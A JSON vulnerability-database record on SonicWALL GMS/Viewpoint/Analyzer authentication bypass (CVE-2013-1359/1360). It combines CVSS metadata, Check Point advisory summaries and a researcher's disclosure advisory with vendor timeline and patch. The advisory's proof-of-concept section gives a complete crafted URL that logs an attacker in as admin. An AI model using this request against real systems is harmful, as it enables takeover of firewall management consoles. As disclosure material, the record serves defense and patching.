"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T10:44:59", "description": "An arbitrary file upload vulnerability has been reported in SonicWALL Products. The vulnerability is due to authentication bypass in the Web Administration interface. A remote attacker could exploit this vulnerability by sending a malicious request to the target server. 
Successful exploitation of this vulnerability could allow the attacker to upload arbitrary files to the vulnerable system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-08T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SonicWALL Products Authentication Bypass (CVE-2013-1359)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-07-23T00:00:00", "id": "CPAI-2013-1808", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:33:33", "description": "An authentication bypass vulnerability has been reported in SonicWALL Products. The vulnerability is due to authentication bypass in the Web Administration interface. 
Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {}, "published": "2014-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SonicWALL Products Authentication Bypass - Ver2 (CVE-2013-1359)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2014-03-31T00:00:00", "id": "CPAI-2014-1290", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-08-11T05:18:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-01-18T00:00:00", "type": "exploitdb", "title": "SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2013-1360", "CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24203", "href": "https://www.exploit-db.com/exploits/24203", "sourceData": "-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass 
(/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL 
(http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. 
For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to broken session handling in the\r\npassword change process of the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromise of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to log in to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to log in.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. 
calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory", "sourceHref": "https://www.exploit-db.com/download/24203", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}